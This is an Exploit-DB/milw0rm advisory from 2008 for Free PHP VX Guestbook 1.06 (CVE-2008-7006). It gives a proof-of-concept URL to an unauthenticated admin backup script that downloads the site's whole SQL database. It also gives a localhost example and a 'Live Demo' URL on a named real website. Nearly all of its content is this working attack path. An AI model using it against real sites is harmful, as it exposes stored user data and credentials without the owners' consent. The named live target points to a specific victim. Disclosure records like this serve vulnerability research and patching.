Free PHP VX Guestbook 1.06 - Arbitrary Database Backup Vulnerability

2008-09-13T00:00:00
ID EDB-ID:6456
Type exploitdb
Reporter SirGod
Modified 2008-09-13T00:00:00

Description

Free PHP VX Guestbook 1.06 Arbitrary Database Backup Vulnerability. CVE-2008-7006. Webapps exploit for php platform

                                        
                                            ###############################################################################################
[+] Free PHP VX Guestbook 1.06 Arbitrary Backup Database
[+] Discovered By SirGod 
[+] wWw.MorTal-TeaM.OrG                   
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke                    
################################################################################################

 [+] Arbitrary Backup Database

  Follow the example and the database download will begin :

   [dbname]_db_backup.sql

 
  PoC :

    http://[target]/[path]/admin/backupdb.php

  Example :

    http://127.0.0.1/book/admin/backupdb.php

  Live Demo :

    http://phpversion.com/book/admin/backupdb.php


################################################################################################

# milw0rm.com [2008-09-13]